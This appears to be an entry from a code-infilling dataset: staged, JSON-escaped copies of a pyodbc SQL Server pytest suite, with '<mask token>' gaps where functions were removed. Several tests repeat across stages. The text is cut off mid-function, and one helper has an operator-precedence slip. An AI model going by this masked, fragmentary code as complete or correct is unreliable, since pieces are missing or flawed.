cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'Y123.45Y'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.clear_output_converters()\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)\n assert prev_converter is None\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'Y123.45Y'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n\n\n<mask token>\n\n\ndef test_context_manager_success():\n \"\"\"Ensure `with` commits if an exception is not raised\"\"\"\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int)')\n cnxn.commit()\n with cnxn:\n cursor.execute('insert into t1 values (1)')\n rows = cursor.execute('select n from t1').fetchall()\n assert len(rows) == 1\n assert rows[0][0] == 1\n\n\ndef test_context_manager_failure(cursor: pyodbc.Cursor):\n \"\"\"Ensure `with` rolls back if an exception is raised\"\"\"\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int)')\n cursor.execute('insert into t1 values (1)')\n cnxn.commit()\n with pytest.raises(pyodbc.Error):\n with cnxn:\n cursor.execute('insert into t1 values (2)')\n cursor.execute('delete from bogus')\n cursor.execute('select max(n) from t1')\n val = cursor.fetchval()\n assert val == 1\n\n\ndef test_untyped_none(cursor: pyodbc.Cursor):\n value = cursor.execute('select ?', None).fetchone()[0]\n assert value is None\n\n\ndef test_large_update_nodata(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a varbinary(max))')\n hundredkb = b'x' * 100 * 1024\n cursor.execute('update t1 set a=? where 1=0', (hundredkb,))\n\n\n<mask token>\n\n\ndef test_columns(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b varchar(3), xΏz varchar(4))')\n cursor.columns('t1')\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n cursor.columns('t1', schema=None, catalog=None)\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n row = results['xΏz']\n assert row.type_name == 'varchar'\n assert row.column_size == 4, row.column_size\n for i in range(8, 16):\n table_name = 'pyodbc_89abcdef'[:i]\n cursor.execute(\n f\"\"\"\n IF OBJECT_ID (N'{table_name}', N'U') IS NOT NULL DROP TABLE {table_name};\n CREATE TABLE {table_name} (id INT PRIMARY KEY);\n \"\"\"\n )\n col_count = len([col.column_name for col in cursor.columns(table_name)]\n )\n assert col_count == 1\n cursor.execute(f'drop table {table_name}')\n\n\n<mask token>\n\n\ndef test_emoticons_as_parameter(cursor: pyodbc.Cursor):\n v = 'x 🌜 z'\n cursor.execute('create table t1(s nvarchar(100))')\n cursor.execute('insert into t1 values (?)', v)\n result = cursor.execute('select s from t1').fetchone()[0]\n assert result == v\n\n\n<mask token>\n\n\[email protected](IS_FREEDTS, reason='FreeTDS does not support TVP')\ndef test_tvp_diffschema(cursor: pyodbc.Cursor):\n _test_tvp(cursor, True)\n\n\n<mask token>\n\n\n@lru_cache()\ndef _generate_str(length, encoding=None):\n \"\"\"\n Returns either a string or bytes, depending on whether encoding is provided,\n that is `length` elements long.\n\n If length is None, None is returned. This simplifies the tests by letting us put None into\n an array of other lengths and pass them here, moving the special case check into one place.\n \"\"\"\n if length is None:\n return None\n v = 'á'\n remaining = max(0, length - len(v))\n if remaining:\n seed = '0123456789-abcdefghijklmnopqrstuvwxyz-'\n if remaining <= len(seed):\n v += seed\n else:\n c = remaining + len(seed) - 1 // len(seed)\n v += seed * c\n if encoding:\n v = v.encode(encoding)\n v = v[:length]\n return v\n",
"step-3": "<mask token>\n\n\ndef connect(autocommit=False, attrs_before=None):\n return pyodbc.connect(CNXNSTR, autocommit=autocommit, attrs_before=\n attrs_before)\n\n\n<mask token>\n\n\ndef test_text(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'text')\n\n\n<mask token>\n\n\ndef test_nvarchar(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'nvarchar')\n\n\ndef test_varbinary(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'varbinary')\n\n\[email protected](SQLSERVER_YEAR < 2005, reason=\n '(max) not supported until 2005')\ndef test_unicode_longmax(cursor: pyodbc.Cursor):\n cursor.execute(\"select cast(replicate(N'x', 512) as nvarchar(max))\")\n\n\n<mask token>\n\n\ndef test_int(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'int', [None, -1, 0, 1, 12345678])\n\n\ndef test_bigint(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'bigint', [None, -1, 0, 1, 4886718345, 2147483647,\n 4294967295, 4886718345])\n\n\ndef test_overflow_int(cursor: pyodbc.Cursor):\n input = 9999999999999999999999999999999999999\n cursor.execute('create table t1(d bigint)')\n with pytest.raises(OverflowError):\n cursor.execute('insert into t1 values (?)', input)\n result = cursor.execute('select * from t1').fetchall()\n assert result == []\n\n\n<mask token>\n\n\ndef test_drivers():\n p = pyodbc.drivers()\n assert isinstance(p, list)\n\n\ndef test_datasources():\n p = pyodbc.dataSources()\n assert isinstance(p, dict)\n\n\n<mask token>\n\n\ndef test_getinfo_bool():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_ACCESSIBLE_TABLES)\n assert isinstance(value, bool)\n\n\ndef test_getinfo_int():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_DEFAULT_TXN_ISOLATION)\n assert isinstance(value, int)\n\n\ndef test_getinfo_smallint():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_CONCAT_NULL_BEHAVIOR)\n assert isinstance(value, int)\n\n\ndef test_no_fetch(cursor: pyodbc.Cursor):\n cursor.execute('select 1')\n cursor.execute('select 1')\n cursor.execute('select 1')\n\n\ndef test_decode_meta(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure column names with non-ASCII characters are converted using the configured encodings.\n \"\"\"\n cursor.execute('create table t1(a int)')\n cursor.execute('insert into t1 values (1)')\n cursor.execute('select a as \"Tipología\" from t1')\n assert cursor.description[0][0] == 'Tipología'\n\n\ndef test_exc_integrity(cursor: pyodbc.Cursor):\n \"\"\"Make sure an IntegretyError is raised\"\"\"\n cursor.execute('create table t1(s1 varchar(10) primary key)')\n cursor.execute(\"insert into t1 values ('one')\")\n with pytest.raises(pyodbc.IntegrityError):\n cursor.execute(\"insert into t1 values ('one')\")\n\n\ndef test_multiple_bindings(cursor: pyodbc.Cursor):\n \"\"\"More than one bind and select on a cursor\"\"\"\n cursor.execute('create table t1(n int)')\n cursor.execute('insert into t1 values (?)', 1)\n cursor.execute('insert into t1 values (?)', 2)\n cursor.execute('insert into t1 values (?)', 3)\n for _ in range(3):\n cursor.execute('select n from t1 where n < ?', 10)\n cursor.execute('select n from t1 where n < 3')\n\n\n<mask token>\n\n\ndef _test_vartype(cursor: pyodbc.Cursor, datatype):\n if datatype == 'text':\n lengths = LARGE_FENCEPOST_SIZES\n else:\n lengths = SMALL_FENCEPOST_SIZES\n if datatype == 'text':\n cursor.execute(f'create table t1(c1 {datatype})')\n else:\n maxlen = lengths[-1]\n cursor.execute(f'create table t1(c1 {datatype}({maxlen}))')\n for length in lengths:\n cursor.execute('delete from t1')\n encoding = datatype in ('blob', 'varbinary') and 'utf8' or None\n value = _generate_str(length, encoding=encoding)\n try:\n cursor.execute('insert into t1 values(?)', value)\n except pyodbc.Error as ex:\n msg = f'{datatype} insert failed: length={length} len={len(value)}'\n raise Exception(msg) from ex\n v = cursor.execute('select * from t1').fetchone()[0]\n assert v == value\n\n\n<mask token>\n\n\ndef test_noscan(cursor: pyodbc.Cursor):\n assert cursor.noscan is False\n cursor.noscan = True\n assert cursor.noscan is True\n\n\n<mask token>\n\n\ndef test_native_uuid(cursor: pyodbc.Cursor):\n value = uuid.uuid4()\n cursor.execute('create table t1(n uniqueidentifier)')\n cursor.execute('insert into t1 values (?)', value)\n pyodbc.native_uuid = True\n result = cursor.execute('select n from t1').fetchval()\n assert isinstance(result, uuid.UUID)\n assert value == result\n\n\n<mask token>\n\n\[email protected](IS_FREEDTS, reason=\n 'https://github.com/FreeTDS/freetds/issues/230')\ndef test_nextset_with_raiserror(cursor: pyodbc.Cursor):\n cursor.execute(\"select i = 1; RAISERROR('c', 16, 1);\")\n row = next(cursor)\n assert 1 == row.i\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.nextset()\n\n\n<mask token>\n\n\ndef test_bit(cursor: pyodbc.Cursor):\n value = True\n cursor.execute('create table t1(b bit)')\n cursor.execute('insert into t1 values (?)', value)\n v = cursor.execute('select b from t1').fetchone()[0]\n assert isinstance(v, bool)\n assert v == value\n\n\ndef test_decimal(cursor: pyodbc.Cursor):\n for precision, scale, negative in [(1, 0, False), (1, 0, True), (6, 0, \n False), (6, 2, False), (6, 4, True), (6, 6, True), (38, 0, False),\n (38, 10, False), (38, 38, False), (38, 0, True), (38, 10, True), (\n 38, 38, True)]:\n try:\n cursor.execute('drop table t1')\n except:\n pass\n cursor.execute(f'create table t1(d decimal({precision}, {scale}))')\n sign = negative and '-' or ''\n before = '9' * (precision - scale)\n after = scale and '.' + '9' * scale or ''\n decStr = f'{sign}{before}{after}'\n value = Decimal(decStr)\n cursor.execute('insert into t1 values(?)', value)\n v = cursor.execute('select d from t1').fetchone()[0]\n assert v == value\n\n\ndef test_decimal_e(cursor: pyodbc.Cursor):\n \"\"\"Ensure exponential notation decimals are properly handled\"\"\"\n value = Decimal((0, (1, 2, 3), 5))\n cursor.execute('create table t1(d decimal(10, 2))')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select * from t1').fetchone()[0]\n assert result == value\n\n\n<mask token>\n\n\ndef test_close_cnxn():\n \"\"\"Make sure using a Cursor after closing its connection doesn't crash.\"\"\"\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('drop table if exists t1')\n cursor.execute('create table t1(id integer, s varchar(20))')\n cursor.execute('insert into t1 values (?,?)', 1, 'test')\n cursor.execute('select * from t1')\n cnxn.close()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute('select * from t1')\n\n\ndef test_empty_string(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s varchar(20))')\n cursor.execute('insert into t1 values(?)', '')\n\n\ndef test_empty_string_encoding():\n cnxn = connect()\n cnxn.setdecoding(pyodbc.SQL_CHAR, encoding='shift_jis')\n value = ''\n cursor = cnxn.cursor()\n cursor.execute('create table t1(s varchar(20))')\n cursor.execute('insert into t1 values(?)', value)\n v = cursor.execute('select * from t1').fetchone()[0]\n assert v == value\n\n\n<mask token>\n\n\ndef test_negative_row_index(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s varchar(20))')\n cursor.execute('insert into t1 values(?)', '1')\n row = cursor.execute('select * from t1').fetchone()\n assert row[0] == '1'\n assert row[-1] == '1'\n\n\ndef test_version():\n assert 3 == len(pyodbc.version.split('.'))\n\n\[email protected](IS_MSODBCSQL and SQLSERVER_YEAR < 2008, reason=\n 'Date not supported until 2008?')\ndef test_date(cursor: pyodbc.Cursor):\n value = date.today()\n cursor.execute('create table t1(d date)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select d from t1').fetchone()[0]\n assert isinstance(result, date)\n assert value == result\n\n\n<mask token>\n\n\ndef test_datetime_fraction_rounded(cursor: pyodbc.Cursor):\n full = datetime(2007, 1, 15, 3, 4, 5, 123456)\n rounded = datetime(2007, 1, 15, 3, 4, 5, 123000)\n cursor.execute('create table t1(dt datetime)')\n cursor.execute('insert into t1 values (?)', full)\n result = cursor.execute('select dt from t1').fetchone()[0]\n assert isinstance(result, datetime)\n assert rounded == result\n\n\ndef test_datetime2(cursor: pyodbc.Cursor):\n value = datetime(2007, 1, 15, 3, 4, 5)\n cursor.execute('create table t1(dt datetime2)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select dt from t1').fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\ndef test_sp_results(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n select top 10 name, id, xtype, refdate\n from sysobjects\n \"\"\"\n )\n rows = cursor.execute('exec proc1').fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10\n assert isinstance(rows[0].refdate, datetime)\n\n\ndef test_sp_results_from_temp(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n set nocount on\n select top 10 name, id, xtype, refdate\n into #tmptable\n from sysobjects\n\n select * from #tmptable\n \"\"\"\n )\n cursor.execute('exec proc1')\n assert cursor.description is not None\n assert len(cursor.description) == 4\n rows = cursor.fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10\n assert isinstance(rows[0].refdate, datetime)\n\n\n<mask token>\n\n\ndef test_sp_with_dates(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n if exists (select * from dbo.sysobjects where id = object_id(N'[test_sp]')\n and OBJECTPROPERTY(id, N'IsProcedure') = 1)\n drop procedure [dbo].[test_sp]\n \"\"\"\n )\n cursor.execute(\n \"\"\"\n create procedure test_sp(@d1 datetime, @d2 datetime)\n AS\n declare @d as int\n set @d = datediff(year, @d1, @d2)\n select @d\n \"\"\"\n )\n cursor.execute('exec test_sp ?, ?', datetime.now(), datetime.now())\n rows = cursor.fetchall()\n assert rows is not None\n assert rows[0][0] == 0\n\n\n<mask token>\n\n\ndef test_rowcount_delete(cursor: pyodbc.Cursor):\n assert cursor.rowcount == -1\n cursor.execute('create table t1(i int)')\n count = 4\n for i in range(count):\n cursor.execute('insert into t1 values (?)', i)\n cursor.execute('delete from t1')\n assert cursor.rowcount == count\n\n\n<mask token>\n\n\ndef test_rowcount_select(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure Cursor.rowcount is set properly after a select statement.\n\n pyodbc calls SQLRowCount after each execute and sets Cursor.rowcount, but SQL Server 2005\n returns -1 after a select statement, so we'll test for that behavior. This is valid\n behavior according to the DB API specification, but people don't seem to like it.\n \"\"\"\n cursor.execute('create table t1(i int)')\n count = 4\n for i in range(count):\n cursor.execute('insert into t1 values (?)', i)\n cursor.execute('select * from t1')\n assert cursor.rowcount == -1\n rows = cursor.fetchall()\n assert len(rows) == count\n assert cursor.rowcount == -1\n\n\n<mask token>\n\n\ndef test_retcursor_delete(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(i int)')\n cursor.execute('insert into t1 values (1)')\n v = cursor.execute('delete from t1')\n assert v == cursor\n\n\ndef test_retcursor_nodata(cursor: pyodbc.Cursor):\n \"\"\"\n This represents a different code path than a delete that deleted something.\n\n The return value is SQL_NO_DATA and code after it was causing an error. We could use\n SQL_NO_DATA to step over the code that errors out and drop down to the same SQLRowCount\n code.\n \"\"\"\n cursor.execute('create table t1(i int)')\n v = cursor.execute('delete from t1')\n assert v == cursor\n\n\n<mask token>\n\n\ndef table_with_spaces(cursor: pyodbc.Cursor):\n \"\"\"Ensure we can select using [x z] syntax\"\"\"\n try:\n cursor.execute('create table [test one](int n)')\n cursor.execute('insert into [test one] values(1)')\n cursor.execute('select * from [test one]')\n v = cursor.fetchone()[0]\n assert v == 1\n finally:\n cursor.rollback()\n\n\n<mask token>\n\n\ndef test_row_description(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure Cursor.description is accessible as Row.cursor_description.\n \"\"\"\n cursor.execute('create table t1(a int, b char(3))')\n cursor.execute(\"insert into t1 values(1, 'abc')\")\n row = cursor.execute('select * from t1').fetchone()\n assert cursor.description == row.cursor_description\n\n\ndef test_temp_select(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s char(7))')\n cursor.execute('insert into t1 values(?)', 'testing')\n v = cursor.execute('select * from t1').fetchone()[0]\n assert isinstance(v, str)\n assert v == 'testing'\n cursor.execute('select s into t2 from t1')\n v = cursor.execute('select * from t1').fetchone()[0]\n assert isinstance(v, str)\n assert v == 'testing'\n\n\ndef test_executemany(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b varchar(10))')\n params = [(i, str(i)) for i in range(1, 6)]\n cursor.executemany('insert into t1(a, b) values (?,?)', params)\n count = cursor.execute('select count(*) from t1').fetchone()[0]\n assert count == len(params)\n cursor.execute('select a, b from t1 order by a')\n rows = cursor.fetchall()\n assert count == len(rows)\n for param, row in zip(params, rows):\n assert param[0] == row[0]\n assert param[1] == row[1]\n\n\n<mask token>\n\n\ndef test_executemany_dae_0(cursor: pyodbc.Cursor):\n \"\"\"\n DAE for 0-length value\n \"\"\"\n cursor.execute('create table t1(a nvarchar(max))')\n cursor.fast_executemany = True\n cursor.executemany('insert into t1(a) values(?)', [['']])\n assert cursor.execute('select a from t1').fetchone()[0] == ''\n cursor.fast_executemany = False\n\n\n<mask token>\n\n\ndef test_row_slicing(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b int, c int, d int)')\n cursor.execute('insert into t1 values(1,2,3,4)')\n row = cursor.execute('select * from t1').fetchone()\n result = row[:]\n assert result is row\n result = row[:-1]\n assert result == (1, 2, 3)\n result = row[0:4]\n assert result is row\n\n\ndef test_row_repr(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b int, c int, d varchar(50))')\n cursor.execute(\"insert into t1 values(1,2,3,'four')\")\n row = cursor.execute('select * from t1').fetchone()\n result = str(row)\n assert result == \"(1, 2, 3, 'four')\"\n result = str(row[:-1])\n assert result == '(1, 2, 3)'\n result = str(row[:1])\n assert result == '(1,)'\n\n\ndef test_concatenation(cursor: pyodbc.Cursor):\n v2 = '0123456789' * 30\n v3 = '9876543210' * 30\n cursor.execute(\n 'create table t1(c1 int identity(1, 1), c2 varchar(300), c3 varchar(300))'\n )\n cursor.execute('insert into t1(c2, c3) values (?,?)', v2, v3)\n row = cursor.execute('select c2, c3, c2 + c3 as both from t1').fetchone()\n assert row.both == v2 + v3\n\n\n<mask token>\n\n\ndef test_autocommit():\n cnxn = connect()\n assert cnxn.autocommit is False\n cnxn = None\n cnxn = connect(autocommit=True)\n assert cnxn.autocommit is True\n cnxn.autocommit = False\n assert cnxn.autocommit is False\n\n\ndef test_sqlserver_callproc(cursor: pyodbc.Cursor):\n try:\n cursor.execute('drop procedure pyodbctest')\n cursor.commit()\n except:\n pass\n cursor.execute('create table t1(s varchar(10))')\n cursor.execute('insert into t1 values(?)', 'testing')\n cursor.execute(\n \"\"\"\n create procedure pyodbctest @var1 varchar(32)\n as\n begin\n select s from t1\n return\n end\n \"\"\"\n )\n cursor.execute(\"exec pyodbctest 'hi'\")\n\n\ndef test_skip(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(id int)')\n for i in range(1, 5):\n cursor.execute('insert into t1 values(?)', i)\n cursor.execute('select id from t1 order by id')\n assert cursor.fetchone()[0] == 1\n cursor.skip(2)\n assert cursor.fetchone()[0] == 4\n\n\ndef test_timeout():\n cnxn = connect()\n assert cnxn.timeout == 0\n cnxn.timeout = 30\n assert cnxn.timeout == 30\n cnxn.timeout = 0\n assert cnxn.timeout == 0\n\n\ndef test_sets_execute(cursor: pyodbc.Cursor):\n cursor.execute('create table t1 (word varchar (100))')\n words = {'a', 'b', 'c'}\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute('insert into t1 (word) values (?)', words)\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.executemany('insert into t1 (word) values (?)', words)\n\n\ndef test_row_execute(cursor: pyodbc.Cursor):\n \"\"\"Ensure we can use a Row object as a parameter to execute\"\"\"\n cursor.execute('create table t1(n int, s varchar(10))')\n cursor.execute(\"insert into t1 values (1, 'a')\")\n row = cursor.execute('select n, s from t1').fetchone()\n assert row\n cursor.execute('create table t2(n int, s varchar(10))')\n cursor.execute('insert into t2 values (?, ?)', row)\n\n\ndef test_row_executemany(cursor: pyodbc.Cursor):\n \"\"\"Ensure we can use a Row object as a parameter to executemany\"\"\"\n cursor.execute('create table t1(n int, s varchar(10))')\n for i in range(3):\n cursor.execute('insert into t1 values (?, ?)', i, chr(ord('a') + i))\n rows = cursor.execute('select n, s from t1').fetchall()\n assert len(rows) != 0\n cursor.execute('create table t2(n int, s varchar(10))')\n cursor.executemany('insert into t2 values (?, ?)', rows)\n\n\ndef test_description(cursor: pyodbc.Cursor):\n \"\"\"Ensure cursor.description is correct\"\"\"\n cursor.execute('create table t1(n int, s varchar(8), d decimal(5,2))')\n cursor.execute(\"insert into t1 values (1, 'abc', '1.23')\")\n cursor.execute('select * from t1')\n t = cursor.description[0]\n assert t[0] == 'n'\n assert t[1] == int\n assert t[5] == 0\n assert t[6] is True\n t = cursor.description[1]\n assert t[0] == 's'\n assert t[1] == str\n assert t[4] == 8\n assert t[5] == 0\n assert t[6] is True\n t = cursor.description[2]\n assert t[0] == 'd'\n assert t[1] == Decimal\n assert t[4] == 5\n assert t[5] == 2\n assert t[6] is True\n\n\n<mask token>\n\n\ndef test_cursor_messages_with_stored_proc(cursor: pyodbc.Cursor):\n \"\"\"\n Complex scenario to test the Cursor.messages attribute.\n \"\"\"\n cursor.execute(\n \"\"\"\n create or alter procedure test_cursor_messages as\n begin\n set nocount on;\n print 'Message 1a';\n print 'Message 1b';\n select N'Field 1a' AS F UNION ALL SELECT N'Field 1b';\n select N'Field 2a' AS F UNION ALL SELECT N'Field 2b';\n print 'Message 2a';\n print 'Message 2b';\n end\n \"\"\"\n )\n cursor.execute('exec test_cursor_messages')\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 1a', 'Field 1b']\n msgs = [re.search('Message \\\\d[ab]$', m[1]).group(0) for m in cursor.\n messages]\n assert msgs == ['Message 1a', 'Message 1b']\n assert cursor.nextset()\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 2a', 'Field 2b']\n assert not cursor.messages\n assert cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n msgs = [re.search('Message \\\\d[ab]$', m[1]).group(0) for m in cursor.\n messages]\n assert msgs == ['Message 2a', 'Message 2b']\n assert not cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n assert not cursor.messages\n\n\ndef test_none_param(cursor: pyodbc.Cursor):\n \"\"\"Ensure None can be used for params other than the first\"\"\"\n cursor.execute('create table t1(n int, blob varbinary(max))')\n cursor.execute('insert into t1 values (1, newid())')\n row = cursor.execute('select * from t1').fetchone()\n assert row.n == 1\n assert isinstance(row.blob, bytes)\n sql = 'update t1 set n=?, blob=?'\n try:\n cursor.execute(sql, 2, None)\n except pyodbc.DataError:\n if IS_FREEDTS:\n cursor.setinputsizes([(), (pyodbc.SQL_VARBINARY, None, None)])\n cursor.execute(sql, 2, None)\n else:\n raise\n row = cursor.execute('select * from t1').fetchone()\n assert row.n == 2\n assert row.blob is None\n\n\ndef test_output_conversion():\n\n def convert1(value):\n return 'X' + value.decode('latin1') + 'X'\n\n def convert2(value):\n return 'Y' + value.decode('latin1') + 'Y'\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int, v varchar(10))')\n cursor.execute(\"insert into t1 values (1, '123.45')\")\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.clear_output_converters()\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.remove_output_converter(pyodbc.SQL_VARCHAR)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, None)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)\n assert prev_converter is not None\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'Y123.45Y'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.clear_output_converters()\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)\n assert prev_converter is None\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'Y123.45Y'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n\n\ndef test_too_large(cursor: pyodbc.Cursor):\n \"\"\"Ensure error raised if insert fails due to truncation\"\"\"\n value = 'x' * 1000\n cursor.execute('create table t1(s varchar(800))')\n with pytest.raises(pyodbc.Error):\n cursor.execute('insert into t1 values (?)', value)\n\n\n<mask token>\n\n\ndef test_context_manager_success():\n \"\"\"Ensure `with` commits if an exception is not raised\"\"\"\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int)')\n cnxn.commit()\n with cnxn:\n cursor.execute('insert into t1 values (1)')\n rows = cursor.execute('select n from t1').fetchall()\n assert len(rows) == 1\n assert rows[0][0] == 1\n\n\ndef test_context_manager_failure(cursor: pyodbc.Cursor):\n \"\"\"Ensure `with` rolls back if an exception is raised\"\"\"\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int)')\n cursor.execute('insert into t1 values (1)')\n cnxn.commit()\n with pytest.raises(pyodbc.Error):\n with cnxn:\n cursor.execute('insert into t1 values (2)')\n cursor.execute('delete from bogus')\n cursor.execute('select max(n) from t1')\n val = cursor.fetchval()\n assert val == 1\n\n\ndef test_untyped_none(cursor: pyodbc.Cursor):\n value = cursor.execute('select ?', None).fetchone()[0]\n assert value is None\n\n\ndef test_large_update_nodata(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a varbinary(max))')\n hundredkb = b'x' * 100 * 1024\n cursor.execute('update t1 set a=? where 1=0', (hundredkb,))\n\n\ndef test_func_param(cursor: pyodbc.Cursor):\n try:\n cursor.execute('drop function func1')\n except:\n pass\n cursor.execute(\n \"\"\"\n create function func1 (@testparam varchar(4))\n returns @rettest table (param varchar(4))\n as\n begin\n insert @rettest\n select @testparam\n return\n end\n \"\"\"\n )\n cursor.commit()\n value = cursor.execute('select * from func1(?)', 'test').fetchone()[0]\n assert value == 'test'\n\n\ndef test_columns(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b varchar(3), xΏz varchar(4))')\n cursor.columns('t1')\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n cursor.columns('t1', schema=None, catalog=None)\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n row = results['xΏz']\n assert row.type_name == 'varchar'\n assert row.column_size == 4, row.column_size\n for i in range(8, 16):\n table_name = 'pyodbc_89abcdef'[:i]\n cursor.execute(\n f\"\"\"\n IF OBJECT_ID (N'{table_name}', N'U') IS NOT NULL DROP TABLE {table_name};\n CREATE TABLE {table_name} (id INT PRIMARY KEY);\n \"\"\"\n )\n col_count = len([col.column_name for col in cursor.columns(table_name)]\n )\n assert col_count == 1\n cursor.execute(f'drop table {table_name}')\n\n\n<mask token>\n\n\ndef test_emoticons_as_parameter(cursor: pyodbc.Cursor):\n v = 'x 🌜 z'\n cursor.execute('create table t1(s nvarchar(100))')\n cursor.execute('insert into t1 values (?)', v)\n result = cursor.execute('select s from t1').fetchone()[0]\n assert result == v\n\n\ndef test_emoticons_as_literal(cursor: pyodbc.Cursor):\n v = 'x 🌜 z'\n cursor.execute('create table t1(s nvarchar(100))')\n cursor.execute(f\"insert into t1 values (N'{v}')\")\n result = cursor.execute('select s from t1').fetchone()[0]\n assert result == v\n\n\n<mask token>\n\n\[email protected](IS_FREEDTS, reason='FreeTDS does not support TVP')\ndef test_tvp_diffschema(cursor: pyodbc.Cursor):\n _test_tvp(cursor, True)\n\n\ndef get_sqlserver_version(cursor: pyodbc.Cursor):\n \"\"\"\n Returns the major version: 8-->2000, 9-->2005, 10-->2008\n \"\"\"\n cursor.execute(\"exec master..xp_msver 'ProductVersion'\")\n row = cursor.fetchone()\n return int(row.Character_Value.split('.', 1)[0])\n\n\n@lru_cache()\ndef _generate_str(length, encoding=None):\n \"\"\"\n Returns either a string or bytes, depending on whether encoding is provided,\n that is `length` elements long.\n\n If length is None, None is returned. This simplifies the tests by letting us put None into\n an array of other lengths and pass them here, moving the special case check into one place.\n \"\"\"\n if length is None:\n return None\n v = 'á'\n remaining = max(0, length - len(v))\n if remaining:\n seed = '0123456789-abcdefghijklmnopqrstuvwxyz-'\n if remaining <= len(seed):\n v += seed\n else:\n c = remaining + len(seed) - 1 // len(seed)\n v += seed * c\n 